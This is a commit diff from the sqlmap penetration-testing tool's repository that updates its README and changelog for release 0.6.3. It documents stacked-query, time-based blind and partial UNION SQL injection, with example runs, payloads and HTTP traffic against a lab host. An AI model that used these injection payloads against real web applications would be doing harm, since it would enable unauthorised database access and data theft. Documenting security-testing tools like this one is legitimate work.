mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
Updated documentation, ready for sqlmap 0.6.3 release
This commit is contained in:
parent
b7f2602b50
commit
36d9ede001
|
@ -6,9 +6,9 @@ sqlmap (0.6.3-1) stable; urgency=low
|
||||||
'conversations/' folder path by providing option -l <filepath>;
|
'conversations/' folder path by providing option -l <filepath>;
|
||||||
* Major enhancement to support Partial UNION query SQL injection
|
* Major enhancement to support Partial UNION query SQL injection
|
||||||
technique too;
|
technique too;
|
||||||
* Major enhancement to support stacked queries (multiple staatements)
|
* Major enhancement to test if the web application technology supports
|
||||||
when the web application supports them which is useful for time based
|
stacked queries (multiple statements) by providing option
|
||||||
blind sql injection test and will be used someday also by takeover
|
--stacked-test which will be then used someday also by takeover
|
||||||
functionality;
|
functionality;
|
||||||
* Major enhancement to test if the injectable parameter is affected by
|
* Major enhancement to test if the injectable parameter is affected by
|
||||||
a time based blind SQL injection technique by providing option
|
a time based blind SQL injection technique by providing option
|
||||||
|
|
220
doc/README.html
220
doc/README.html
|
@ -446,6 +446,7 @@ Options:
|
||||||
or to use one of them to exploit the affected parameter(s) rather than
|
or to use one of them to exploit the affected parameter(s) rather than
|
||||||
using the default blind SQL injection technique.
|
using the default blind SQL injection technique.
|
||||||
|
|
||||||
|
--stacked-test Test for stacked queries (multiple statements) support
|
||||||
--time-test Test for Time based blind SQL injection
|
--time-test Test for Time based blind SQL injection
|
||||||
--union-test Test for UNION query (inband) SQL injection
|
--union-test Test for UNION query (inband) SQL injection
|
||||||
--union-use Use the UNION query (inband) SQL injection to retrieve
|
--union-use Use the UNION query (inband) SQL injection to retrieve
|
||||||
|
@ -1801,11 +1802,104 @@ stability test.</P>
|
||||||
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Techniques</A>
|
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Techniques</A>
|
||||||
</H2>
|
</H2>
|
||||||
|
|
||||||
|
<H3>Test for stacked queries (multiple statements) support</H3>
|
||||||
|
|
||||||
|
<P>Option: <CODE>--stacked-test</CODE></P>
|
||||||
|
|
||||||
|
<P>It is possible to test if the web application technology supports
|
||||||
|
<B>stacked queries</B>, multiple statements, on the injectable
|
||||||
|
parameter.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
|
||||||
|
--stacked-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
|
||||||
|
stacked queries support: None
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
<P>By default PHP builtin function <CODE>mysql_query()</CODE> does not support
|
||||||
|
multiple statements.
|
||||||
|
Multiple statements is a feature supported by default only by some
|
||||||
|
web application technologies in relation to the back-end database
|
||||||
|
management system. For instance, as you can see from the next example,
|
||||||
|
where PHP does not support them on MySQL, it does on PostgreSQL.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
|
||||||
|
--stacked-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Test for Time based blind SQL injection</H3>
|
<H3>Test for Time based blind SQL injection</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>--time-test</CODE></P>
|
<P>Option: <CODE>--time-test</CODE></P>
|
||||||
|
|
||||||
<P>TODO</P>
|
<P>It is possible to test if the target URL is affected by a <B>Time based
|
||||||
|
blind SQL injection</B> vulnerability.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
|
||||||
|
--time-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND
|
||||||
|
condition syntax
|
||||||
|
[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection
|
||||||
|
with AND condition syntax
|
||||||
|
time based blind sql injection payload: 'id=1 AND SLEEP(5) AND 5249=5249'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
|
||||||
|
--time-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND
|
||||||
|
condition syntax
|
||||||
|
[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql
|
||||||
|
injection with AND condition syntax
|
||||||
|
[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked
|
||||||
|
query syntax
|
||||||
|
[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection
|
||||||
|
with stacked query syntax
|
||||||
|
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Test for UNION query SQL injection</H3>
|
<H3>Test for UNION query SQL injection</H3>
|
||||||
|
@ -1873,7 +1967,10 @@ UNION query SQL injection</B> and use this technique to go ahead with the
|
||||||
exploiting.
|
exploiting.
|
||||||
If the confirmation fails, it will check if the parameter is affected by
|
If the confirmation fails, it will check if the parameter is affected by
|
||||||
a <B>Partial UNION query SQL injection</B>, then use it to go ahead if it
|
a <B>Partial UNION query SQL injection</B>, then use it to go ahead if it
|
||||||
is vulnerable.</P>
|
is vulnerable.
|
||||||
|
In case the inband SQL injection vulnerability is not exploitable, sqlmap
|
||||||
|
will automatically fallback on the blind SQL injection technique to go
|
||||||
|
ahead.</P>
|
||||||
|
|
||||||
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
|
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
|
||||||
<P>
|
<P>
|
||||||
|
@ -1915,18 +2012,19 @@ vulnerabilities.</P>
|
||||||
<BLOCKQUOTE><CODE>
|
<BLOCKQUOTE><CODE>
|
||||||
<PRE>
|
<PRE>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
|
||||||
--union-use --banner
|
--union-use --current-user
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:25] [INFO] the target url is affected by an exploitable full inband sql injection
|
[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql
|
||||||
vulnerability
|
injection vulnerability
|
||||||
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
|
[hh:mm:29] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
|
||||||
VERSION(),CHAR(122,110,105,89,121,65)), NULL# AND 6043=6043
|
IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)),
|
||||||
[hh:mm:25] [TRAFFIC OUT] HTTP request:
|
NULL# AND 8032=8032
|
||||||
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
|
[hh:mm:29] [TRAFFIC OUT] HTTP request:
|
||||||
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
|
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112
|
||||||
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL%23%20AND%2
|
%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29
|
||||||
06043=6043 HTTP/1.1
|
%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
|
||||||
|
%208032=8032 HTTP/1.1
|
||||||
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
|
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
|
||||||
Host: 192.168.1.121:80
|
Host: 192.168.1.121:80
|
||||||
Accept-language: en-us,en;q=0.5
|
Accept-language: en-us,en;q=0.5
|
||||||
|
@ -1935,11 +2033,11 @@ image/png,*/*;q=0.5
|
||||||
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
|
[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
|
||||||
Date: Mon, 28 Jul 2008 22:34:25 GMT
|
Date: Tue, 16 Dec 2008 hh:mm:29 GMT
|
||||||
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9
|
||||||
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
|
||||||
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
X-Powered-By: PHP/5.2.6-2ubuntu4
|
||||||
Content-Length: 194
|
Content-Length: 194
|
||||||
Connection: close
|
Connection: close
|
||||||
Content-Type: text/html
|
Content-Type: text/html
|
||||||
|
@ -1948,21 +2046,81 @@ Content-Type: text/html
|
||||||
<b>SQL results:</b>
|
<b>SQL results:</b>
|
||||||
<table border="1">
|
<table border="1">
|
||||||
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
||||||
<tr><td></td><td>FPMIFA5.0.67-0ubuntu6zFQAiQ</td><td></td></tr>
|
<tr><td></td><td>pnyMXVtestuser@localhostHYKMyg</td><td></td></tr>
|
||||||
</table>
|
</table>
|
||||||
</body></html>
|
</body></html>
|
||||||
|
|
||||||
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
|
[hh:mm:29] [INFO] performed 3 queries in 0 seconds
|
||||||
banner: '5.0.67-0ubuntu6'
|
current user: 'testuser@localhost'
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
|
||||||
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
|
<P>As you can see, the MySQL <CODE>CURRENT_USER()</CODE> function (--current-user)
|
||||||
nested (inband) within the HTTP response page, this makes the inband SQL
|
output is nested, inband, within the HTTP response page, this makes the
|
||||||
injection exploitable.</P>
|
inband SQL injection exploited.</P>
|
||||||
|
|
||||||
<P>TODO: details on partial ...</P>
|
<P>In case the inband SQL injection is not fully exploitable, sqlmap will
|
||||||
|
check if it is partially exploitable: this occurs if the query output
|
||||||
|
is not parsed within a <CODE>for</CODE>, or similar, cycle but only the first
|
||||||
|
entry is displayed in the page content.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \
|
||||||
|
--union-use --dbs
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:56] [INFO] fetching database names
|
||||||
|
[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
|
||||||
|
[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql
|
||||||
|
injection vulnerability
|
||||||
|
[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection
|
||||||
|
vulnerability
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
|
||||||
|
IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL
|
||||||
|
FROM information_schema.SCHEMATA# AND 1062=1062
|
||||||
|
[hh:mm:56] [INFO] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] the SQL query provided returns 4 entries
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
|
||||||
|
[hh:mm:56] [INFO] performed 7 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
|
||||||
|
[hh:mm:56] [INFO] performed 8 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
|
||||||
|
[hh:mm:56] [INFO] performed 9 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
|
||||||
|
[hh:mm:56] [INFO] performed 10 queries in 0 seconds
|
||||||
|
available databases [4]:
|
||||||
|
[*] information_schema
|
||||||
|
[*] mysql
|
||||||
|
[*] privatedb
|
||||||
|
[*] test
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
<P>As you can see, sqlmap identified that the parameter is affected by a
|
||||||
|
partial inband SQL injection, consequently counted the number of query
|
||||||
|
output entries and retrieved once per time by forcing the parameter
|
||||||
|
(<CODE>id</CODE>) value <CODE>1</CODE> to its negative value <CODE>-1</CODE> so that
|
||||||
|
it does not returns, presumibly, any output leaving our own <CODE>UNION ALL
|
||||||
|
SELECT</CODE> statement to produce one entry at a time and display it in the
|
||||||
|
page content.</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Fingerprint</A>
|
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Fingerprint</A>
|
||||||
|
@ -2742,14 +2900,14 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --col
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
[15:54:25] [WARNING] missing database parameter, sqlmap is going to use the current
|
[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current
|
||||||
database to enumerate table 'users' columns
|
database to enumerate table 'users' columns
|
||||||
[15:54:25] [INFO] fetching current database
|
[hh:mm:25] [INFO] fetching current database
|
||||||
[15:54:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
|
[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
|
||||||
[15:54:25] [INFO] retrieved: test
|
[hh:mm:25] [INFO] retrieved: test
|
||||||
[15:54:25] [INFO] performed 34 queries in 0 seconds
|
[hh:mm:25] [INFO] performed 34 queries in 0 seconds
|
||||||
[15:54:25] [INFO] fetching columns for table 'users' on database 'test'
|
[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
|
||||||
[15:54:25] [INFO] fetching number of columns for table 'users' on database 'test'
|
[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
|
||||||
[...]
|
[...]
|
||||||
Database: test
|
Database: test
|
||||||
Table: users
|
Table: users
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
212
doc/README.sgml
212
doc/README.sgml
|
@ -403,6 +403,7 @@ Options:
|
||||||
or to use one of them to exploit the affected parameter(s) rather than
|
or to use one of them to exploit the affected parameter(s) rather than
|
||||||
using the default blind SQL injection technique.
|
using the default blind SQL injection technique.
|
||||||
|
|
||||||
|
--stacked-test Test for stacked queries (multiple statements) support
|
||||||
--time-test Test for Time based blind SQL injection
|
--time-test Test for Time based blind SQL injection
|
||||||
--union-test Test for UNION query (inband) SQL injection
|
--union-test Test for UNION query (inband) SQL injection
|
||||||
--union-use Use the UNION query (inband) SQL injection to retrieve
|
--union-use Use the UNION query (inband) SQL injection to retrieve
|
||||||
|
@ -1742,13 +1743,101 @@ stability test.
|
||||||
|
|
||||||
<sect1>Techniques
|
<sect1>Techniques
|
||||||
|
|
||||||
|
<sect2>Test for stacked queries (multiple statements) support
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Option: <tt>--stacked-test</tt>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
It is possible to test if the web application technology supports
|
||||||
|
<bf>stacked queries</bf>, multiple statements, on the injectable
|
||||||
|
parameter.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
|
||||||
|
--stacked-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
|
||||||
|
stacked queries support: None
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
By default PHP builtin function <tt>mysql_query()</tt> does not support
|
||||||
|
multiple statements.
|
||||||
|
Multiple statements is a feature supported by default only by some
|
||||||
|
web application technologies in relation to the back-end database
|
||||||
|
management system. For instance, as you can see from the next example,
|
||||||
|
where PHP does not support them on MySQL, it does on PostgreSQL.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>PostgreSQL 8.3.5</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
|
||||||
|
--stacked-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Test for Time based blind SQL injection
|
<sect2>Test for Time based blind SQL injection
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Option: <tt>--time-test</tt>
|
Option: <tt>--time-test</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
TODO
|
It is possible to test if the target URL is affected by a <bf>Time based
|
||||||
|
blind SQL injection</bf> vulnerability.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
|
||||||
|
--time-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND
|
||||||
|
condition syntax
|
||||||
|
[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection
|
||||||
|
with AND condition syntax
|
||||||
|
time based blind sql injection payload: 'id=1 AND SLEEP(5) AND 5249=5249'
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>PostgreSQL 8.3.5</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
|
||||||
|
--time-test -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND
|
||||||
|
condition syntax
|
||||||
|
[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql
|
||||||
|
injection with AND condition syntax
|
||||||
|
[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked
|
||||||
|
query syntax
|
||||||
|
[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection
|
||||||
|
with stacked query syntax
|
||||||
|
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Test for UNION query SQL injection
|
<sect2>Test for UNION query SQL injection
|
||||||
|
@ -1818,6 +1907,9 @@ exploiting.
|
||||||
If the confirmation fails, it will check if the parameter is affected by
|
If the confirmation fails, it will check if the parameter is affected by
|
||||||
a <bf>Partial UNION query SQL injection</bf>, then use it to go ahead if it
|
a <bf>Partial UNION query SQL injection</bf>, then use it to go ahead if it
|
||||||
is vulnerable.
|
is vulnerable.
|
||||||
|
In case the inband SQL injection vulnerability is not exploitable, sqlmap
|
||||||
|
will automatically fallback on the blind SQL injection technique to go
|
||||||
|
ahead.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
||||||
|
@ -1858,18 +1950,19 @@ Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
<tscreen><verb>
|
<tscreen><verb>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
|
||||||
--union-use --banner
|
--union-use --current-user
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:25] [INFO] the target url is affected by an exploitable full inband sql injection
|
[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql
|
||||||
vulnerability
|
injection vulnerability
|
||||||
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
|
[hh:mm:29] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
|
||||||
VERSION(),CHAR(122,110,105,89,121,65)), NULL# AND 6043=6043
|
IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)),
|
||||||
[hh:mm:25] [TRAFFIC OUT] HTTP request:
|
NULL# AND 8032=8032
|
||||||
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
|
[hh:mm:29] [TRAFFIC OUT] HTTP request:
|
||||||
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
|
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112
|
||||||
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL%23%20AND%2
|
%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29
|
||||||
06043=6043 HTTP/1.1
|
%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
|
||||||
|
%208032=8032 HTTP/1.1
|
||||||
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
|
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
|
||||||
Host: 192.168.1.121:80
|
Host: 192.168.1.121:80
|
||||||
Accept-language: en-us,en;q=0.5
|
Accept-language: en-us,en;q=0.5
|
||||||
|
@ -1878,11 +1971,11 @@ image/png,*/*;q=0.5
|
||||||
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
|
[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
|
||||||
Date: Mon, 28 Jul 2008 22:34:25 GMT
|
Date: Tue, 16 Dec 2008 hh:mm:29 GMT
|
||||||
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9
|
||||||
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
|
||||||
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
X-Powered-By: PHP/5.2.6-2ubuntu4
|
||||||
Content-Length: 194
|
Content-Length: 194
|
||||||
Connection: close
|
Connection: close
|
||||||
Content-Type: text/html
|
Content-Type: text/html
|
||||||
|
@ -1891,21 +1984,80 @@ Content-Type: text/html
|
||||||
<b>SQL results:</b>
|
<b>SQL results:</b>
|
||||||
<table border="1">
|
<table border="1">
|
||||||
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
||||||
<tr><td></td><td>FPMIFA5.0.67-0ubuntu6zFQAiQ</td><td></td></tr>
|
<tr><td></td><td>pnyMXVtestuser@localhostHYKMyg</td><td></td></tr>
|
||||||
</table>
|
</table>
|
||||||
</body></html>
|
</body></html>
|
||||||
|
|
||||||
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
|
[hh:mm:29] [INFO] performed 3 queries in 0 seconds
|
||||||
banner: '5.0.67-0ubuntu6'
|
current user: 'testuser@localhost'
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
As you can see, the MySQL <tt>version()</tt> function (banner) output is
|
As you can see, the MySQL <tt>CURRENT_USER()</tt> function (--current-user)
|
||||||
nested (inband) within the HTTP response page, this makes the inband SQL
|
output is nested, inband, within the HTTP response page, this makes the
|
||||||
injection exploitable.
|
inband SQL injection exploited.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
TODO: details on partial ...
|
In case the inband SQL injection is not fully exploitable, sqlmap will
|
||||||
|
check if it is partially exploitable: this occurs if the query output
|
||||||
|
is not parsed within a <tt>for</tt>, or similar, cycle but only the first
|
||||||
|
entry is displayed in the page content.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
